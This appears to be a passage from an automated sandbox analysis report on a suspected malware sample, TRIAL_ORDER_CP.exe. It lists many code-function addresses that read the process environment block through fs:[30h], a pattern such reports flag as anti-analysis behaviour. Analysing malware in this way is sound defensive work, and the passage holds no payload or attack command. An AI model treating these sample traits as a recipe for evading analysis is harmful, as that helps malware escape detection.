        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B177F9 mov eax, dword ptr fs:[00000030h]3_2_33B177F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B177F9 mov eax, dword ptr fs:[00000030h]3_2_33B177F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3E7E0 mov eax, dword ptr fs:[00000030h]3_2_33B3E7E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B137E4 mov eax, dword ptr fs:[00000030h]3_2_33B137E4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF7CF mov eax, dword ptr fs:[00000030h]3_2_33BCF7CF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B39723 mov eax, dword ptr fs:[00000030h]3_2_33B39723
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1471B mov eax, dword ptr fs:[00000030h]3_2_33B1471B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1471B mov eax, dword ptr fs:[00000030h]3_2_33B1471B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF717 mov eax, dword ptr fs:[00000030h]3_2_33BCF717
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1D700 mov ecx, dword ptr fs:[00000030h]3_2_33B1D700
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B705 mov eax, dword ptr fs:[00000030h]3_2_33B0B705
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B705 mov eax, dword ptr fs:[00000030h]3_2_33B0B705
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B705 mov eax, dword ptr fs:[00000030h]3_2_33B0B705
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0B705 mov eax, dword ptr fs:[00000030h]3_2_33B0B705
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD970B mov eax, dword ptr fs:[00000030h]3_2_33BD970B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD970B mov eax, dword ptr fs:[00000030h]3_2_33BD970B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3270D mov eax, dword ptr fs:[00000030h]3_2_33B3270D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3270D mov eax, dword ptr fs:[00000030h]3_2_33B3270D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3270D mov eax, dword ptr fs:[00000030h]3_2_33B3270D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B40774 mov eax, dword ptr fs:[00000030h]3_2_33B40774
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B14779 mov eax, dword ptr fs:[00000030h]3_2_33B14779
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B14779 mov eax, dword ptr fs:[00000030h]3_2_33B14779
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B22760 mov ecx, dword ptr fs:[00000030h]3_2_33B22760
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 mov eax, dword ptr fs:[00000030h]3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A750 mov eax, dword ptr fs:[00000030h]3_2_33B4A750
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov ecx, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32755 mov eax, dword ptr fs:[00000030h]3_2_33B32755
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0F75B mov eax, dword ptr fs:[00000030h]3_2_33B0F75B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBE750 mov eax, dword ptr fs:[00000030h]3_2_33BBE750
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B43740 mov eax, dword ptr fs:[00000030h]3_2_33B43740
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4174A mov eax, dword ptr fs:[00000030h]3_2_33B4174A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD86A8 mov eax, dword ptr fs:[00000030h]3_2_33BD86A8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD86A8 mov eax, dword ptr fs:[00000030h]3_2_33BD86A8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B18690 mov eax, dword ptr fs:[00000030h]3_2_33B18690
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8D69D mov eax, dword ptr fs:[00000030h]3_2_33B8D69D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9C691 mov eax, dword ptr fs:[00000030h]3_2_33B9C691
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF68C mov eax, dword ptr fs:[00000030h]3_2_33BCF68C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20680 mov eax, dword ptr fs:[00000030h]3_2_33B20680
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8C6F2 mov eax, dword ptr fs:[00000030h]3_2_33B8C6F2
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8C6F2 mov eax, dword ptr fs:[00000030h]3_2_33B8C6F2
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B096E0 mov eax, dword ptr fs:[00000030h]3_2_33B096E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B096E0 mov eax, dword ptr fs:[00000030h]3_2_33B096E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1C6E0 mov eax, dword ptr fs:[00000030h]3_2_33B1C6E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B156E0 mov eax, dword ptr fs:[00000030h]3_2_33B156E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B156E0 mov eax, dword ptr fs:[00000030h]3_2_33B156E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B156E0 mov eax, dword ptr fs:[00000030h]3_2_33B156E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B366E0 mov eax, dword ptr fs:[00000030h]3_2_33B366E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B366E0 mov eax, dword ptr fs:[00000030h]3_2_33B366E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3D6D0 mov eax, dword ptr fs:[00000030h]3_2_33B3D6D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDA6C0 mov eax, dword ptr fs:[00000030h]3_2_33BDA6C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B106CF mov eax, dword ptr fs:[00000030h]3_2_33B106CF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B10630 mov eax, dword ptr fs:[00000030h]3_2_33B10630
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B40630 mov eax, dword ptr fs:[00000030h]3_2_33B40630
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B98633 mov esi, dword ptr fs:[00000030h]3_2_33B98633
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B98633 mov eax, dword ptr fs:[00000030h]3_2_33B98633
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B98633 mov eax, dword ptr fs:[00000030h]3_2_33B98633
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4F63F mov eax, dword ptr fs:[00000030h]3_2_33B4F63F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4F63F mov eax, dword ptr fs:[00000030h]3_2_33B4F63F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B17623 mov eax, dword ptr fs:[00000030h]3_2_33B17623
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B15622 mov eax, dword ptr fs:[00000030h]3_2_33B15622
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B15622 mov eax, dword ptr fs:[00000030h]3_2_33B15622
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4C620 mov eax, dword ptr fs:[00000030h]3_2_33B4C620
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBD62C mov ecx, dword ptr fs:[00000030h]3_2_33BBD62C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBD62C mov ecx, dword ptr fs:[00000030h]3_2_33BBD62C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBD62C mov eax, dword ptr fs:[00000030h]3_2_33BBD62C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BA3608 mov eax, dword ptr fs:[00000030h]3_2_33BA3608
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3D600 mov eax, dword ptr fs:[00000030h]3_2_33B3D600
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3D600 mov eax, dword ptr fs:[00000030h]3_2_33B3D600
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF607 mov eax, dword ptr fs:[00000030h]3_2_33BCF607
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4360F mov eax, dword ptr fs:[00000030h]3_2_33B4360F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B10670 mov eax, dword ptr fs:[00000030h]3_2_33B10670
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52670 mov eax, dword ptr fs:[00000030h]3_2_33B52670
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B52670 mov eax, dword ptr fs:[00000030h]3_2_33B52670
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B23660 mov eax, dword ptr fs:[00000030h]3_2_33B23660
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B23660 mov eax, dword ptr fs:[00000030h]3_2_33B23660
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B23660 mov eax, dword ptr fs:[00000030h]3_2_33B23660
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B07662 mov eax, dword ptr fs:[00000030h]3_2_33B07662
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B07662 mov eax, dword ptr fs:[00000030h]3_2_33B07662
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B07662 mov eax, dword ptr fs:[00000030h]3_2_33B07662
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4666D mov esi, dword ptr fs:[00000030h]3_2_33B4666D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4666D mov eax, dword ptr fs:[00000030h]3_2_33B4666D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4666D mov eax, dword ptr fs:[00000030h]3_2_33B4666D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B45654 mov eax, dword ptr fs:[00000030h]3_2_33B45654
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4265C mov eax, dword ptr fs:[00000030h]3_2_33B4265C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4265C mov ecx, dword ptr fs:[00000030h]3_2_33B4265C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4265C mov eax, dword ptr fs:[00000030h]3_2_33B4265C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1965A mov eax, dword ptr fs:[00000030h]3_2_33B1965A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1965A mov eax, dword ptr fs:[00000030h]3_2_33B1965A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F640 mov eax, dword ptr fs:[00000030h]3_2_33B2F640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F640 mov eax, dword ptr fs:[00000030h]3_2_33B2F640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F640 mov eax, dword ptr fs:[00000030h]3_2_33B2F640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4C640 mov eax, dword ptr fs:[00000030h]3_2_33B4C640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4C640 mov eax, dword ptr fs:[00000030h]3_2_33B4C640
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D64A mov eax, dword ptr fs:[00000030h]3_2_33B0D64A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0D64A mov eax, dword ptr fs:[00000030h]3_2_33B0D64A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B145B0 mov eax, dword ptr fs:[00000030h]3_2_33B145B0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B145B0 mov eax, dword ptr fs:[00000030h]3_2_33B145B0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B985AA mov eax, dword ptr fs:[00000030h]3_2_33B985AA
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B42594 mov eax, dword ptr fs:[00000030h]3_2_33B42594
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9C592 mov eax, dword ptr fs:[00000030h]3_2_33B9C592
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E588 mov eax, dword ptr fs:[00000030h]3_2_33B8E588
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E588 mov eax, dword ptr fs:[00000030h]3_2_33B8E588
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A580 mov eax, dword ptr fs:[00000030h]3_2_33B4A580
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A580 mov eax, dword ptr fs:[00000030h]3_2_33B4A580
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B49580 mov eax, dword ptr fs:[00000030h]3_2_33B49580
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B49580 mov eax, dword ptr fs:[00000030h]3_2_33B49580
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BCF582 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9C5FC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B1B5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4A5E7 mov ebx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4A5E7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B415EF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B465D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4C5C6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0F5C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B905C6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B13536 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B13536 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B0753F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B41527 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B4F523 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B2252B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B9C51D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]
